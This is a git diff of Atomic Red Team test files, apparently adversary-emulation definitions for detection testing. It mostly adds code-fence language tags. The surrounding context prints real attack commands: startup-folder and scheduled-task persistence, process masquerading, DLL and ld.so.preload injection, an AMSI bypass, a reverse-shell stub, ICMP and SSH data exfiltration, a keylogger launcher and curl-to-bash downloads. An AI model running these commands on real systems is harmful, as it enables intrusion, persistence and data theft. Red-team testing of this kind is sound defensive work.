+40,7 @@ ls -l ``` #### Cleanup Commands: -``` +```sh rm -Rf /tmp/victim-files ``` @@ -58,7 +60,9 @@ rar a -p"blue" hello.rar (VARIANT) #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd mkdir .\tmp\victim-files cd .\tmp\victim-files echo "This file will be encrypted" > .\encrypted_file.txt @@ -90,7 +94,9 @@ wzzip sample.zip -s"blueblue" *.txt (VARIANT) #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd path=%path%;"C:\Program Files (x86)\winzip" mkdir .\tmp\victim-files cd .\tmp\victim-files @@ -101,14 +107,15 @@ dir + #### Dependencies: Run with `powershell`! ##### Description: Winzip must be installed ##### Check Prereq Commands: -``` +```powershell cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' ``` ##### Get Prereq Commands: -``` +```powershell if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue cmd /c "$env:Temp\winzip.exe" @@ -129,7 +136,9 @@ Note: Requires 7zip installation #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd mkdir $PathToAtomicsFolder\T1022\victim-files cd $PathToAtomicsFolder\T1022\victim-files echo "This file will be encrypted" > .\encrypted_file.txt diff --git a/atomics/T1023/T1023.md b/atomics/T1023/T1023.md index f57957fc..bb1e7be3 100644 --- a/atomics/T1023/T1023.md +++ b/atomics/T1023/T1023.md @@ -25,7 +25,9 @@ gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-Strin #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1 ``` @@ -45,7 +47,9 @@ LNK file to launch CMD placed in startup folder #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $Shell = New-Object -ComObject ("WScript.Shell") $ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk") $ShortCut.TargetPath="cmd.exe" @@ -64,7 +68,7 @@ $ShortCut.Save() ``` #### Cleanup Commands: -``` +```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore ``` diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index bf035e79..c5e566ce 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -29,7 +29,9 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip #### Attack Commands: Run with `sh`! -``` + + +```sh sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat" cat /tmp/encoded.dat | base64 -d > /tmp/art.sh chmod +x /tmp/art.sh @@ -57,7 +59,9 @@ Creates base64-encoded PowerShell code and executes it. This is used by numerous #### Attack Commands: Run with `powershell`! -``` + + +```powershell $OriginalCommand = '#{powershell_command}' $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand) $EncodedCommand =[Convert]::ToBase64String($Bytes) @@ -89,7 +93,9 @@ Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates i #### Attack Commands: Run with `powershell`! -``` + + +```powershell $OriginalCommand = '#{powershell_command}' $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand) $EncodedCommand =[Convert]::ToBase64String($Bytes) @@ -100,7 +106,7 @@ powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::From ``` #### Cleanup Commands: -``` +```powershell Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} ``` diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md index eb5723d3..e8a6fba1 100644 --- a/atomics/T1028/T1028.md +++ b/atomics/T1028/T1028.md @@ -25,7 +25,9 @@ Powershell Enable WinRM #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Enable-PSRemoting -Force ``` @@ -54,7 +56,9 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") ``` @@ -81,7 +85,9 @@ Utilize WMIC to start remote process #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" ``` @@ -108,7 +114,9 @@ Utilize psexec to start remote process #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd psexec \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe ``` @@ -134,7 +142,9 @@ Execute Invoke-command on remote host #### Attack Commands: Run with `powershell`! -``` + + +```powershell invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} ``` diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index c9612687..f7f99cfa 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -17,7 +17,9 @@ Take a file/directory, split it into 5Mb chunks #### Attack Commands: Run with `sh`! -``` + + +```sh cd /tmp/ dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1 split -b 5000000 /tmp/victim-whole-file diff --git a/atomics/T1031/T1031.md b/atomics/T1031/T1031.md index 48f6fd76..de2797d1 100644 --- a/atomics/T1031/T1031.md +++ b/atomics/T1031/T1031.md @@ -22,13 +22,15 @@ and will then revert the binPath change, restoring Fax to its original state. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\"" sc start Fax ``` #### Cleanup Commands: -``` +```cmd sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" ``` diff --git a/atomics/T1032/T1032.md b/atomics/T1032/T1032.md index 1271d31a..7d87e29a 100644 --- a/atomics/T1032/T1032.md +++ b/atomics/T1032/T1032.md @@ -26,7 +26,9 @@ https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client- #### Attack Commands: Run with `powershell`! -``` + + +```powershell $server_ip = #{server_ip} $server_port = #{server_port} $socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port}) diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index 9d2877df..d179b0af 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -34,7 +34,9 @@ Identify System owner or users on an endpoint #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd cmd.exe /C whoami wmic useraccount get /ALL quser /SERVER:"#{computer_name}" @@ -61,7 +63,9 @@ Identify System owner or users on an endpoint #### Attack Commands: Run with `sh`! -``` + + +```sh users w who diff --git a/atomics/T1035/T1035.md b/atomics/T1035/T1035.md index 5e4ce58f..74d8f021 100644 --- a/atomics/T1035/T1035.md +++ b/atomics/T1035/T1035.md @@ -25,7 +25,9 @@ Creates a service specifying an aribrary command and executes it. When executing #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd sc.exe create #{service_name} binPath= #{executable_command} sc.exe start #{service_name} sc.exe delete #{service_name} @@ -54,20 +56,23 @@ Will run a command on a remote host #### Attack Commands: Run with `powershell`! -``` + + +```powershell #{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe" ``` + #### Dependencies: Run with `powershell`! ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md index 1a9da0c9..9b4791bb 100644 --- a/atomics/T1036/T1036.md +++ b/atomics/T1036/T1036.md @@ -47,13 +47,15 @@ Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsas #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe cmd.exe /c %SystemRoot%\Temp\lsass.exe ``` #### Cleanup Commands: -``` +```cmd del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 ``` @@ -72,7 +74,9 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro #### Attack Commands: Run with `sh`! -``` + + +```sh cp /bin/sh /tmp/crond /tmp/crond ``` @@ -93,13 +97,15 @@ Copies cscript.exe, renames it, and launches it to masquerade as an instance of #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y cmd.exe /c %APPDATA%\notepad.exe /B ``` #### Cleanup Commands: -``` +```cmd del /Q /F %APPDATA%\notepad.exe >nul 2>&1 ``` @@ -118,13 +124,15 @@ Copies wscript.exe, renames it, and launches it to masquerade as an instance of #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y cmd.exe /c %APPDATA%\svchost.exe /B ``` #### Cleanup Commands: -``` +```cmd del /Q /F %APPDATA%\svchost.exe >nul 2>&1 ``` @@ -143,13 +151,15 @@ Copies powershell.exe, renames it, and launches it to masquerade as an instance #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y cmd.exe /K %APPDATA%\taskhostw.exe ``` #### Cleanup Commands: -``` +```cmd del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 ``` @@ -174,26 +184,29 @@ Copies an exe, renames it as a windows exe, and launches it to masquerade as a r #### Attack Commands: Run with `powershell`! -``` + + +```powershell copy #{inputfile} #{outputfile} $myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id Stop-Process -ID $myT1036 ``` #### Cleanup Commands: -``` +```powershell Remove-Item #{outputfile} -Force -ErrorAction Ignore ``` + #### Dependencies: Run with `powershell`! ##### Description: Exe file to copy must exist on disk at specified location (#{inputfile}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{inputfile}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/t1036.exe" -OutFile "#{inputfile}" ``` @@ -218,14 +231,16 @@ Copies a windows exe, renames it as another windows exe, and launches it to masq #### Attack Commands: Run with `powershell`! -``` + + +```powershell copy #{inputfile} #{outputfile} $myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id Stop-Process -ID $myT1036 ``` #### Cleanup Commands: -``` +```powershell Remove-Item #{outputfile} -Force -ErrorAction Ignore ``` @@ -245,13 +260,15 @@ This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd copy C:\Windows\System32\cmd.exe C:\lsm.exe C:\lsm.exe /c echo T1036 > C:\T1036.txt ``` #### Cleanup Commands: -``` +```cmd del C:\T1036.txt >nul 2>&1 del C:\lsm.exe >nul 2>&1 ``` diff --git a/atomics/T1037/T1037.md b/atomics/T1037/T1037.md index bf4e9f08..30738c27 100644 --- a/atomics/T1037/T1037.md +++ b/atomics/T1037/T1037.md @@ -41,13 +41,15 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd echo cmd /c "#{script_command}" > #{script_path} REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" ``` #### Cleanup Commands: -``` +```cmd REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f del #{script_path} >nul 2>nul del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul @@ -68,13 +70,15 @@ Run an exe on user logon or system startup #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd schtasks /create /tn "T1037_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" ``` #### Cleanup Commands: -``` +```cmd schtasks /delete /tn "T1037_OnLogon" /f schtasks /delete /tn "T1037_OnStartup" /f ``` @@ -126,7 +130,9 @@ vbs files can be placed in and ran from the startup folder to maintain persistan #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Copy-Item $PathToAtomicsFolder\T1037\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" Copy-Item $PathToAtomicsFolder\T1037\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" @@ -134,7 +140,7 @@ cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta ``` #### Cleanup Commands: -``` +```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore ``` @@ -154,7 +160,9 @@ jse files can be placed in and ran from the startup folder to maintain persistan #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Copy-Item $PathToAtomicsFolder\T1037\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" Copy-Item $PathToAtomicsFolder\T1037\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" @@ -162,7 +170,7 @@ cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sta ``` #### Cleanup Commands: -``` +```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore ``` @@ -182,7 +190,9 @@ bat files can be placed in and ran from the startup folder to maintain persistan #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Copy-Item $PathToAtomicsFolder\T1037\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" Copy-Item $PathToAtomicsFolder\T1037\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" @@ -190,7 +200,7 @@ Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\bats ``` #### Cleanup Commands: -``` +```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore ``` diff --git a/atomics/T1038/T1038.md b/atomics/T1038/T1038.md index 49876672..b334bec1 100644 --- a/atomics/T1038/T1038.md +++ b/atomics/T1038/T1038.md @@ -27,14 +27,16 @@ https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll %APPDATA%\updater.exe -Command exit ``` #### Cleanup Commands: -``` +```cmd del %APPDATA%\updater.exe >nul 2>&1 del %APPDATA%\amsi.dll >nul 2>&1 ``` diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md index dba12d75..2bba8e8c 100644 --- a/atomics/T1040/T1040.md +++ b/atomics/T1040/T1040.md @@ -32,7 +32,9 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in #### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) -``` + + +```bash tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} ``` @@ -58,7 +60,9 @@ Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCP #### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) -``` + + +```bash tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} ``` @@ -85,7 +89,9 @@ installed, along with WinPCAP. Windump will require the windump executable. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 c:\windump.exe ``` @@ -112,7 +118,9 @@ installed, along with WinPCAP. Windump will require the windump executable. #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell & "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 & c:\windump.exe ``` diff --git a/atomics/T1042/T1042.md b/atomics/T1042/T1042.md index 7ed48815..8b4104c6 100644 --- a/atomics/T1042/T1042.md +++ b/atomics/T1042/T1042.md @@ -30,7 +30,9 @@ Change Default File Association From cmd.exe #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}" ``` diff --git a/atomics/T1044/T1044.md b/atomics/T1044/T1044.md index 36808ac2..79506791 100644 --- a/atomics/T1044/T1044.md +++ b/atomics/T1044/T1044.md @@ -34,7 +34,9 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe #### Attack Commands: Run with `powershell`! -``` + + +```powershell Get-WmiObject win32_service | select PathName get-acl "C:\Program Files (x86)\Google\Update\#{weak_permission_file}" | FL | findstr "FullControl" ``` diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index d5d596ac..629440c3 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -21,7 +21,9 @@ Scan ports to check for listening ports #### Attack Commands: Run with `sh`! -``` + + +```sh for port in {1..65535}; do echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ; @@ -51,7 +53,9 @@ Scan ports to check for listening ports with Nmap. #### Attack Commands: Run with `sh`! -``` + + +```sh nmap -sS #{network_range} -p #{port} telnet #{host} #{port} nc -nv #{host} #{port} diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md index d9535442..0b0b8588 100644 --- a/atomics/T1047/T1047.md +++ b/atomics/T1047/T1047.md @@ -29,7 +29,9 @@ WMI List User Accounts #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic useraccount get /ALL ``` @@ -49,7 +51,9 @@ WMI List Processes #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic process get caption,executablepath,commandline ``` @@ -69,7 +73,9 @@ WMI List Software #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic qfe get description,installedOn /format:csv ``` @@ -95,7 +101,9 @@ WMI List Remote Services #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%") ``` @@ -120,7 +128,9 @@ This test uses wmic.exe to execute a process on the local host. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic process call create #{process_to_execute} ``` @@ -146,7 +156,9 @@ This test uses wmic.exe to execute a process on a remote host. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic /node:"#{node}" process call create #{process_to_execute} ``` diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md index 9f1d8c8f..e08b6965 100644 --- a/atomics/T1048/T1048.md +++ b/atomics/T1048/T1048.md @@ -45,7 +45,9 @@ Remote to Local #### Attack Commands: Run with `sh`! -``` + + +```sh ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz ``` @@ -74,7 +76,9 @@ Local to Remote #### Attack Commands: Run with `sh`! -``` + + +```sh tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc' ``` @@ -130,7 +134,9 @@ Exfiltration of specified file over ICMP protocol. #### Attack Commands: Run with `powershell`! -``` + + +```powershell $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } ``` diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md index d8952b50..8014cd20 100644 --- a/atomics/T1049/T1049.md +++ b/atomics/T1049/T1049.md @@ -31,7 +31,9 @@ Get a listing of network connections. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd netstat net use net sessions @@ -53,7 +55,9 @@ Get a listing of network connections. #### Attack Commands: Run with `powershell`! -``` + + +```powershell Get-NetTCPConnection ``` @@ -73,7 +77,9 @@ Get a listing of network connections. #### Attack Commands: Run with `sh`! -``` + + +```sh netstat who -a ``` diff --git a/atomics/T1050/T1050.md b/atomics/T1050/T1050.md index 8f10bf5c..d6b47e4d 100644 --- a/atomics/T1050/T1050.md +++ b/atomics/T1050/T1050.md @@ -27,26 +27,29 @@ Installs A Local Service #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd sc.exe create #{service_name} binPath= #{binary_path} sc.exe start #{service_name} ``` #### Cleanup Commands: -``` +```cmd sc.exe stop #{service_name} sc.exe delete #{service_name} ``` + #### Dependencies: Run with `powershell`! ##### Description: Service binary must exist on disk at specified location (#{binary_path}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{binary_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" ``` @@ -71,27 +74,30 @@ Installs A Local Service via PowerShell #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" 2>&1 | Out-Null Start-Service -Name "#{service_name}" ``` #### Cleanup Commands: -``` +```powershell Stop-Service -Name "#{service_name}" 2>&1 | Out-Null try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} catch {} ``` + #### Dependencies: Run with `powershell`! ##### Description: Service binary must exist on disk at specified location (#{binary_path}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{binary_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" ``` diff --git a/atomics/T1053/T1053.md b/atomics/T1053/T1053.md index 9d85c1f9..1dccf205 100644 --- a/atomics/T1053/T1053.md +++ b/atomics/T1053/T1053.md @@ -26,7 +26,9 @@ Note: deprecated in Windows 8+ #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd at 13:20 /interactive cmd ``` @@ -51,12 +53,14 @@ at 13:20 /interactive cmd #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} ``` #### Cleanup Commands: -``` +```cmd SCHTASKS /Delete /TN spawn /F ``` @@ -84,12 +88,14 @@ Create a task on a remote system #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} ``` #### Cleanup Commands: -``` +```cmd SCHTASKS /Delete /TN "Atomic task" /F ``` @@ -109,7 +115,9 @@ These could be considered "fileless" scheduled task creation. #### Attack Commands: Run with `powershell`! -``` + + +```powershell $Action = New-ScheduledTaskAction -Execute "calc.exe" $Trigger = New-ScheduledTaskTrigger -AtLogon $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest @@ -119,7 +127,7 @@ Register-ScheduledTask AtomicTask -InputObject $object ``` #### Cleanup Commands: -``` +```powershell Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 ``` diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 4dbe3869..c8ec9e94 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -54,21 +54,24 @@ Windows 10 Utility To Inject DLLS #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $mypid = #{process_id} mavinject $mypid /INJECTRUNNING #{dll_payload} ``` + #### Dependencies: Run with `powershell`! ##### Description: Utility to inject must exist on disk at specified location (#{dll_payload}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" ``` @@ -93,7 +96,9 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/ #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $mypid = #{process_id} Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload} ``` @@ -119,7 +124,9 @@ This test adds a shared library to the `ld.so.preload` list to execute and inter #### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) -``` + + +```bash echo #{path_to_shared_library} > /etc/ld.so.preload ``` @@ -144,7 +151,9 @@ This test injects a shared object library via the LD_PRELOAD environment variabl #### Attack Commands: Run with `bash`! -``` + + +```bash LD_PRELOAD=#{path_to_shared_library} ls ``` @@ -176,7 +185,9 @@ Excercises Five Techniques #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd .\bin\#{exe_binary} ``` @@ -197,13 +208,15 @@ This works by copying cmd.exe to a file, naming it svchost.exe, then copying a f #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd copy C:\Windows\System32\cmd.exe C:\svchost.exe C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt ``` #### Cleanup Commands: -``` +```cmd del C:\T1055.txt >nul 2>&1 del C:\svchost.exe >nul 2>&1 ``` diff --git a/atomics/T1056/T1056.md b/atomics/T1056/T1056.md index debe8295..d99354fa 100644 --- a/atomics/T1056/T1056.md +++ b/atomics/T1056/T1056.md @@ -30,13 +30,15 @@ Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/ma #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Set-Location $PathToAtomicsFolder .\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath} ``` #### Cleanup Commands: -``` +```powershell Remove-Item $env:TEMP\key.log -ErrorAction Ignore ``` diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md index 6cbbd41d..5851197b 100644 --- a/atomics/T1057/T1057.md +++ b/atomics/T1057/T1057.md @@ -32,7 +32,9 @@ Utilize ps to identify processes #### Attack Commands: Run with `sh`! -``` + + +```sh ps >> #{output_file} ps aux >> #{output_file} ``` @@ -53,7 +55,9 @@ Utilize tasklist to identify processes #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd tasklist ``` diff --git a/atomics/T1058/T1058.md b/atomics/T1058/T1058.md index c83d2f22..c256e65a 100644 --- a/atomics/T1058/T1058.md +++ b/atomics/T1058/T1058.md @@ -27,7 +27,9 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePa #### Attack Commands: Run with `powershell`! -``` + + +```powershell get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL ``` diff --git a/atomics/T1059/T1059.md b/atomics/T1059/T1059.md index 8c4c3d7b..8e2ed186 100644 --- a/atomics/T1059/T1059.md +++ b/atomics/T1059/T1059.md @@ -21,7 +21,9 @@ This will download the specified payload and set a marker file in `/tmp/art-fish #### Attack Commands: Run with `sh`! -``` + + +```sh bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash" bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash" ``` diff --git a/atomics/T1060/T1060.md b/atomics/T1060/T1060.md index 2bd52117..eddea963 100644 --- a/atomics/T1060/T1060.md +++ b/atomics/T1060/T1060.md @@ -59,12 